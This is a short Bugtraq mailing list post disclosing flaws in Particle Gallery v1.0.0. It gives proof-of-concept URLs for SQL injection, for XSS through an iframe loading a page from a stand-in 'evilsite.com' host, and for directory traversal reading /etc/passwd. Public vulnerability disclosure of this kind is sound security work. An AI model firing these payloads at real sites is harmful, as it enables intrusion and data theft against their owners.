Bugtraq mailing list archives
Particle Gallery v1.0.0
From: luny () youfucktard com
Date: 5 Jun 2006 23:37:01 -0000
Homepage: http://www.particlesoft.net/particlegallery/ Effected files: viewimage.php viewalbum.php SQL Injection: http://www.example.com/viewimage.php?imageid=' XSS Vulnerability proof of concept: http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html> Possible Directory Traversal ?: http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/
Current thread:
- Particle Gallery v1.0.0 luny (Jun 06)